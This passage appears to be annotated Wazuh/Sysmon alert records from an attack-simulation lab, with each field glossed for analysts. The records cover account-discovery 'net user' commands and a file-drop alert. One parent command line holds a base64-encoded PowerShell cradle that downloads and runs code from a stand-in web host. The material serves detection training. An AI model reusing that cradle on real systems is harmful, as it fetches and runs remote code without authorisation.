data.win.eventdata.parentProcessId: 1148 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 24 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534215.999485 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:52.8943928Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282280 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:35:52.870
ProcessGuid: {94294ddc-bcc6-680a-b30a-000000000e00}
ProcessId: 9592
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_mqh0ir2i.w0v.ps1
CreationUtcTime: 2025-04-24 22:35:52.870
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:52.870 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcc6-680a-b30a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 9592 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_mqh0ir2i.w0v.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:35:52.870 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534215.1002249 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:53.9716064Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282297 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:53.953
ProcessGuid: {94294ddc-bcc9-680a-b80a-000000000e00}
ProcessId: 11604
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net user guest
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:53.953 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcc9-680a-b80a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11604 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net user guest No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 4 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534215.1007500 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:54.1048194Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282300 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:54.098
ProcessGuid: {94294ddc-bcca-680a-ba0a-000000000e00}
ProcessId: 4036
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 user guest
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-bcc9-680a-b80a-000000000e00}
ParentProcessId: 11604
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net user guest
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:54.098 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcca-680a-ba0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 4036 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 user guest No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bcc9-680a-b80a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11604 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: net user guest No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 5 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534215.1012577 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:54.2509434Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282303 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:54.246
ProcessGuid: {94294ddc-bcca-680a-bb0a-000000000e00}
ProcessId: 4340
Image: C:\Windows\SysWOW64\net.exe
FileVersion: 10.0.26100.1882 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net.exe
CommandLine: net user administrator
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883
ParentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00}
ParentProcessId: 3244
ParentImage: C:\Program Files (x86)\ossec-agent\wazuh-agent.exe
ParentCommandLine: "C:\Program Files (x86)\ossec-agent\wazuh-agent.exe"
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:54.246 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcca-680a-bb0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 4340 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1882 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: net user administrator No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea7f-67fe-e703-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=0CB12D8D687B36B58A25D18D8FD4C70CB06E2F048518CF0359FC5D51B7C57883 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-ea88-67fe-4900-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 3244 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\Program Files (x86)\\ossec-agent\\wazuh-agent.exe\" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: A net.exe account discovery command was initiated Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92039 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1087'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Discovery'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Account Discovery'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 6 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534216.1017856 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:35:54.3699637Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 282306 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:35:54.361
ProcessGuid: {94294ddc-bcca-680a-bd0a-000000000e00}
ProcessId: 15012
Image: C:\Windows\SysWOW64\net1.exe
FileVersion: 10.0.26100.1 (WinBuild.160101.0800)
Description: Net Command
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: net1.exe
CommandLine: C:\WINDOWS\system32\net1 user administrator
CurrentDirectory: C:\Program Files (x86)\ossec-agent\
User: NT AUTHORITY\SYSTEM
LogonGuid: {94294ddc-ea7f-67fe-e703-000000000000}
LogonId: 0x3E7
TerminalSessionId: 0
IntegrityLevel: System
Hashes: SHA256=647136C32E9E7639B251719CFE503F1BD482335AECEC7AE7CB8A91B0A9805D49
ParentProcessGuid: {94294ddc-bcca-680a-bb0a-000000000e00}
ParentProcessId: 4340
ParentImage: C:\Windows\SysWOW64\net.exe
ParentCommandLine: net user administrator
ParentUser: NT AUTHORITY\SYSTEM" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:35:54.361 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bcca-680a-bd0a-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 15012 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\SysWOW64\\net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.1 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Net Command No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: net1.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: C:\\WINDOWS\\system32\\net1 user administrator No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Program Files (x86)\\ossec-agent\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: NT AUTHORITY\\SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
